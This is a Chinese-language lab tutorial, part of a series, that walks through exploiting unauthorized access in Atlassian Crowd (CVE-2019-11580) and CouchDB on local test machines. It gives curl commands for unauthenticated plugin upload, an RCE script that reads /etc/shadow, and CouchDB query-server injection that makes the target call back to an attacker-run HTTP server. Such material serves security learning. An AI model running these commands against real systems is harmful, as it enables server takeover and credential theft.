黑客最喜欢的常见未授权访问漏洞系( 六 )


Atlassian Crowd 未授权访问漏洞漏洞简介以及危害  Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品 。Atlassian Crowd是一套基于Web的单点登录系统 。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能 。Atlassian Crowd Data Center是Crowd的集群部署版 。Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件,使其存在安全漏洞 。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd Data Center安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限 。
漏洞利用环境介绍目标靶机:Centosip地址:192.168.18.138连接工具:Xshell环境搭建wget https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zipunzip atlassian-crowd-3.4.3.zip

黑客最喜欢的常见未授权访问漏洞系

文章插图
 
cd atlassian-crowd-3.4.3vim crowd-webApp/WEB-INF/classes/crowd-init.properties
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
./start_crowd.sh
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
访问http://192.168.18.138:8095 点击Set up Crowd
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
可以在这里申请试用30天https://my.atlassian.com/products/index 并填写license进行下一步安装,直到安装完成 。
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
未授权访问测试进行上传一个标准的插件,来自atlassian-bundled-plugins中的applinks-plugin-5.4.12.jar
curl --form "file_cdl=@applinks-plugin-5.4.12.jar" http://192.168.18.138:8095/crowd/admin/uploadplugin.action -v成功上传
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
Atlassian Crowd RCE漏洞利用脚本github地址:https://github.com/jas502n/CVE-2019-11580
git clone https://github.com/jas502n/CVE-2019-11580cd CVE-2019-11580/python CVE-2019-11580.py http://192.168.18.138:8095curl http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
防御手段-设置访问/crowd/admin/uploadplugin.action的源ip 。-升级最新版本(3.5.0以上) 。
CouchDB 未授权访问漏洞漏洞简介以及危害  Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库" 。它是一个使用JSON作为存储格式,JAVAScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库 。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能 。其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致未授权访问 。  在官方配置文档中对HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用户都没有这么配置,导致漏洞产生 。
漏洞利用环境介绍目标靶机:Kaliip地址:192.168.18.129连接工具:Xshell环境搭建mkdir couchdbwget https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/docker-compose.yml
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
docker-compose up -d
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
未授权访问测试curl http://192.168.18.129:5984curl http://192.168.18.129:5984/_config
黑客最喜欢的常见未授权访问漏洞系

文章插图
 

黑客最喜欢的常见未授权访问漏洞系

文章插图
 
任意命令执行本机python运行http服务
python -m SimpleHTTPServer 9999
黑客最喜欢的常见未授权访问漏洞系

文章插图
 
#依次执行如下命令curl -X PUT 'http://192.168.18.129:5984/_config/query_servers/cmd' -d '"curl http://192.168.18.138:9999/test.php"'curl -X PUT 'http://192.168.18.129:5984/vultest'curl -X PUT 'http://192.168.18.129:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'curl -X POST 'http://192.168.18.129:5984/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'


推荐阅读